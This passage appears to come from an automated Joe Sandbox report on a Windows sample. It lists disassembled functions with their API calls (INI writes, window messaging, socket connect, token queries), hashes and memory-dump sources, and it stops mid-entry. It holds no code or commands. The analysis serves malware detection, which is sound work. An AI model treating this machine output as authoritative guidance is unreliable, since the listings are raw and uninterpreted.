                                                                                • Opcode ID: 4a8b9d4d7568c31bcccb944b092eafd2d96626098e6ead94d192476cae7367ee
                                                                                • Instruction ID: 587f0a04d89b77f042a94805b098402275b8f75df63ff46896cc739fdc22f1dd
                                                                                • Opcode Fuzzy Hash: 4a8b9d4d7568c31bcccb944b092eafd2d96626098e6ead94d192476cae7367ee
                                                                                • Instruction Fuzzy Hash: 7E41C579D80244AFD710DF78DC84FEABB68EB09310F140176F959A72E1C738AD91DA98
                                                                                Function 00401206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004012B4
                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004012DD
                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0040131C
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00401341
                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00401349
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 1389676194-0
                                                                                • Opcode ID: 27c8439a4808e414b7d5554ee784894fd1f0df3a574b2f5b158ac6af88b8a014
                                                                                • Instruction ID: 7259ba7d68133456471104d2b9eba196da58a2dd65ac26e16473736dc985e853
                                                                                • Opcode Fuzzy Hash: 27c8439a4808e414b7d5554ee784894fd1f0df3a574b2f5b158ac6af88b8a014
                                                                                • Instruction Fuzzy Hash: E8410035A00105DFDB01EF64C991AAEBBF5FF08314B1480A9E909AF761DB35ED01DB55
                                                                                Function 003EB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowRect.USER32(?,?), ref: 003EB369
                                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 003EB413
                                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003EB41B
                                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 003EB429
                                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003EB431
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                • String ID:
                                                                                • API String ID: 3382505437-0
                                                                                • Opcode ID: fa16340512286866cd75d2e8e592314c9e0d9785d14b9829f3d4c9b2ad6d3c33
                                                                                • Instruction ID: e0c158dcae299763ccc59ada4d68f3a15af48a05c0441dd1ef8770ba6bc32060
                                                                                • Opcode Fuzzy Hash: fa16340512286866cd75d2e8e592314c9e0d9785d14b9829f3d4c9b2ad6d3c33
                                                                                • Instruction Fuzzy Hash: C331CE71900269EBDF06CF69D94EADFBBB5EB04315F114229F921AA1D1C3B0D914CB90
                                                                                Function 003EDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindowVisible.USER32(?), ref: 003EDBD7
                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003EDBF4
                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003EDC2C
                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003EDC52
                                                                                • _wcsstr.LIBCMT ref: 003EDC5C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                • String ID:
                                                                                • API String ID: 3902887630-0
                                                                                • Opcode ID: e392ce2a6c03fcd9a06032fdf74cc53080ad33d0dc5d214641e9bb7ad123378a
                                                                                • Instruction ID: adbfef44b5a4d436a57680817bd85a0fe19dac670987273394667b44d0eee442
                                                                                • Opcode Fuzzy Hash: e392ce2a6c03fcd9a06032fdf74cc53080ad33d0dc5d214641e9bb7ad123378a
                                                                                • Instruction Fuzzy Hash: 82213772204150BBEB165B3AAC49E7B7BACDF45750F20413AF809CA191EAA1DC01D360
                                                                                Function 003EBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003EBC90
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003EBCC2
                                                                                • __itow.LIBCMT ref: 003EBCDA
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003EBD00
                                                                                • __itow.LIBCMT ref: 003EBD11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$__itow
                                                                                • String ID:
                                                                                • API String ID: 3379773720-0
                                                                                • Opcode ID: 55db7af65037f12643a959b44eba283062c664396cc06acdacd95749043d7bb0
                                                                                • Instruction ID: 302d1bc806b537553e44caedf4b970b231b0733538aa6c3b7ecdb5630be1d9d6
                                                                                • Opcode Fuzzy Hash: 55db7af65037f12643a959b44eba283062c664396cc06acdacd95749043d7bb0
                                                                                • Instruction Fuzzy Hash: D921D431600628BBDB13AE669C86FDFBA6CAF4A310F101125FA05EF1C1DB648D0583A1
                                                                                Function 003F6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003B50E6: _wcsncpy.LIBCMT ref: 003B50FA
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,003F60C3), ref: 003F6369
                                                                                • GetLastError.KERNEL32(?,?,?,003F60C3), ref: 003F6374
                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003F60C3), ref: 003F6388
                                                                                • _wcsrchr.LIBCMT ref: 003F63AA
                                                                                  • Part of subcall function 003F6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003F60C3), ref: 003F63E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                • String ID:
                                                                                • API String ID: 3633006590-0
                                                                                • Opcode ID: 36e9a5dcea3e7ddc91c0a471fa28a5efa5f4e924b2e953074da40be90bc8c458
                                                                                • Instruction ID: 2f672cd29ad9dbaacbf2c27fdbcf3bbdfa965c30565d58ec54f44114b02dfea9
                                                                                • Opcode Fuzzy Hash: 36e9a5dcea3e7ddc91c0a471fa28a5efa5f4e924b2e953074da40be90bc8c458
                                                                                • Instruction Fuzzy Hash: D821D53590421D9BDB17AB78AC43FFA33ACAF16360F10046BF245DB1E0EB60D9848A65
                                                                                Function 00408B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0040A84E
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00408BD3
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00408BE2
                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00408BFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastconnectinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 3701255441-0
                                                                                • Opcode ID: cb497278d68a5cacb7968dc52654ea9f439b90fc96a6d000c35d44aafdd686ed
                                                                                • Instruction ID: 279b604d5404425b89812de8f0c9704edb93b8cd8eddbccfbb26c28e92a32e5a
                                                                                • Opcode Fuzzy Hash: cb497278d68a5cacb7968dc52654ea9f439b90fc96a6d000c35d44aafdd686ed
                                                                                • Instruction Fuzzy Hash: 7B21F0316042049FDB10AF28DD85F7EB3A8AF48310F04842EFA46AB3D2CF74AC018B65
                                                                                Function 00408420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 00408441
                                                                                • GetForegroundWindow.USER32 ref: 00408458
                                                                                • GetDC.USER32(00000000), ref: 00408494
                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 004084A0
                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 004084DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                • String ID:
                                                                                • API String ID: 4156661090-0
                                                                                • Opcode ID: e95e5340b4eb4ee947f69ab86476d9a7779ced74d250648f03f89de2c98ee0d2
                                                                                • Instruction ID: 8d0721b37c7f500e93c8114dc3e1063a06bfb2cfba316c753af0231e115aaa44
                                                                                • Opcode Fuzzy Hash: e95e5340b4eb4ee947f69ab86476d9a7779ced74d250648f03f89de2c98ee0d2
                                                                                • Instruction Fuzzy Hash: 0B218175A00204AFD700EFA4DD85AAEBBE5EF48301F148879E95A9B252DB74AD01CB64
                                                                                Function 003CAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003CAFE3
                                                                                • SelectObject.GDI32(?,00000000), ref: 003CAFF2
                                                                                • BeginPath.GDI32(?), ref: 003CB009
                                                                                • SelectObject.GDI32(?,00000000), ref: 003CB033
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                • String ID:
                                                                                • API String ID: 3225163088-0
                                                                                • Opcode ID: d3d7b36e3bb9d29a4baa02153012b84cd747c4aa912902ff009aa0dba7f05943
                                                                                • Instruction ID: 0d076b44f5f2c17929f066cac18ce1ad969adce0a2d167360f75271a7daad4cc
                                                                                • Opcode Fuzzy Hash: d3d7b36e3bb9d29a4baa02153012b84cd747c4aa912902ff009aa0dba7f05943
                                                                                • Instruction Fuzzy Hash: E4217FB0800219EFDB12DF69EC89B9E7B68BB10755F14423EE429961B0C3704C95DB99
                                                                                Function 003D217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __calloc_crt.LIBCMT ref: 003D21A9
                                                                                • CreateThread.KERNEL32(?,?,003D22DF,00000000,?,?), ref: 003D21ED
                                                                                • GetLastError.KERNEL32 ref: 003D21F7
                                                                                • _free.LIBCMT ref: 003D2200
                                                                                • __dosmaperr.LIBCMT ref: 003D220B
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                • String ID:
                                                                                • API String ID: 2664167353-0
                                                                                • Opcode ID: 3a141ef3f6aedbea347dc875b24e8e1f7d7bd2004aa17b146eba1395f2c3f7e5
                                                                                • Instruction ID: 15c3910e75772b185186985940005b3e338eefa4a36c1475e98f413055ebb75e
                                                                                • Opcode Fuzzy Hash: 3a141ef3f6aedbea347dc875b24e8e1f7d7bd2004aa17b146eba1395f2c3f7e5
                                                                                • Instruction Fuzzy Hash: ED11C433104706AFDB13AFA5FC42DAB7B98EF55770B11042BF9248A391EB71D81187A1
                                                                                Function 003EABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003EABD7
                                                                                • GetLastError.KERNEL32(?,003EA69F,?,?,?), ref: 003EABE1
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,003EA69F,?,?,?), ref: 003EABF0
                                                                                • HeapAlloc.KERNEL32(00000000,?,003EA69F,?,?,?), ref: 003EABF7
                                                                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003EAC0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 842720411-0
                                                                                • Opcode ID: f98d240b446ad69b7f432f8a454c8fec7f7071b9ee6644e28dab1b3d456beeb8
                                                                                • Instruction ID: 68a68f5a744bc54fa1a3f01f8d03f2385e2fa9f66d4d06f74fb992e07d0cf1a0
                                                                                • Opcode Fuzzy Hash: f98d240b446ad69b7f432f8a454c8fec7f7071b9ee6644e28dab1b3d456beeb8
                                                                                • Instruction Fuzzy Hash: 3A018C70600254BFEB114FAAEC48DAB3BBCEF8A3547210539F905C32A0DA71DC40CB64
                                                                                Function 003F7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003F7A74
                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003F7A82
                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003F7A8A
                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003F7A94
                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003F7AD0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                • String ID:
                                                                                • API String ID: 2833360925-0
                                                                                • Opcode ID: 60df54f598d229c275e4c85f8308b2821700bf4d745a4dddec253b8470353f4a
                                                                                • Instruction ID: 9c0f2580f73b50de6708786055a87bfbaaab13456db072b2fc03120a5fc1b92e
                                                                                • Opcode Fuzzy Hash: 60df54f598d229c275e4c85f8308b2821700bf4d745a4dddec253b8470353f4a
                                                                                • Instruction Fuzzy Hash: 96014C71D0462DEBCF01AFE9EC48AEDBB78FF08711F0205A5E602B2250DB349650C7A5
                                                                                Function 003E9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CLSIDFromProgID.OLE32 ref: 003E9ADC
                                                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 003E9AF7
                                                                                • lstrcmpiW.KERNEL32(?,00000000), ref: 003E9B05
                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 003E9B15
                                                                                • CLSIDFromString.OLE32(?,?), ref: 003E9B21
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 3897988419-0
                                                                                • Opcode ID: 80f75231678c34212e4dbdbd7652d77eacf5cc467e2ddb3eeeea66e241ad0f98
                                                                                • Instruction ID: c6c89ab3228d63a4e37176df59dc339eac4631f171500dabf02593d558c38dd8
                                                                                • Opcode Fuzzy Hash: 80f75231678c34212e4dbdbd7652d77eacf5cc467e2ddb3eeeea66e241ad0f98
                                                                                • Instruction Fuzzy Hash: 5901DF76A00225BFCB025F26EC04B9A7AECEF48351F104435F805D6250D770DD009BA0
                                                                                Function 003EAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003EAA79
                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003EAA83
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003EAA92
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003EAA99
                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003EAAAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 1cfc9c7cac034920e1991cb9bbaea03ea2dc572e00f6688a77b25cf7045fb12f
                                                                                • Instruction ID: 1e9d7f4a41eebf5308a154e92b91c7fa1b26722ec6739ed9681621ee8409765b
                                                                                • Opcode Fuzzy Hash: 1cfc9c7cac034920e1991cb9bbaea03ea2dc572e00f6688a77b25cf7045fb12f
                                                                                • Instruction Fuzzy Hash: 51F04F716103146FEB115FA5AC89EA73BACFF49754F000539F941C7190DA60EC51DA61
                                                                                Function 003EAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003EAADA
                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003EAAE4
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003EAAF3
                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003EAAFA
                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003EAB10
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 44706859-0
                                                                                • Opcode ID: 8cf03d77700f5abda0ac6d3df856cc2a4ca51bfb9a8a474ea7760d720e4f16ab
                                                                                • Instruction ID: ed7cbe367b91d292e8b1f1f6fec531fc01b0186d9f3fcc21a75da64d32fee759
                                                                                • Opcode Fuzzy Hash: 8cf03d77700f5abda0ac6d3df856cc2a4ca51bfb9a8a474ea7760d720e4f16ab
                                                                                • Instruction Fuzzy Hash: 0CF04F716002196FEB121FA5FC88EA73B6DFF49754F000139F942C7190CA60EC119A61
                                                                                Function 003EEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 003EEC94
                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 003EECAB
                                                                                • MessageBeep.USER32(00000000), ref: 003EECC3
